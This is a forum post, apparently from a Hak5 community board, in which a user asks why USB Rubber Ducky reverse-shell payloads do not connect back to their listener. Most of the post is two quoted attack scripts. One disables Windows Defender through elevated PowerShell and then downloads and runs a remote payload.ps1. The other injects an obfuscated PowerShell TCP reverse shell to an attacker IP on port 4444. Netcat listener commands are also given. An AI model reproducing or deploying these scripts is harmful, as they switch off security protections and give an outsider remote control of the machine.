Dominik75 Posted September 16, 2022 Share Posted September 16, 2022 Hello forum members following yotube videos on "Get a Reverse Shell with the USB Rubber Ducky by downloading playloads from https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and REVERSEDUCKY loads," I could not properly make any of the payloads for remote access I did everything like in the videos in this regard and the included payloads on the HAK5 website. Both computers on the same network. I put a rubber ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works: python -m http.server 8000 and the second panel nc -l -p 4444. Unfortunately, I cannot connect to Windows through the shell. Payload.ps1 is on the server of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips.Sample loads: REM Turn off Windows Defender and start reverse shell REM DELAY 1000 GUI r DELAY 200 REM Start an elevated powershell instance which will disable Windows Defender. STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs ENTER DELAY 1000 REM if you need administrator [left, enter and delay 1000] LEFT ENTER DELAY 1000 ALT y DELAY 1000 GUI r DELAY 100 STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');" ENTER STRING exit ENTER anather loads: REM ReverseDucky2 REM Version 1.3 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM Author: 0iphor13 REM Reverse shell executed in the background REM Fill in Attacker-IP and Port in Line 19 REM DON'T FORGET TO START LISTENER DELAY 1500 GUI r DELAY 500 STRING powershell -NoP -NonI -W hidden DELAY 250 ENTER DELAY 200 STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s DELAY 100 STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt DELAY 100 STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE() DELAY 100 ENTER Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.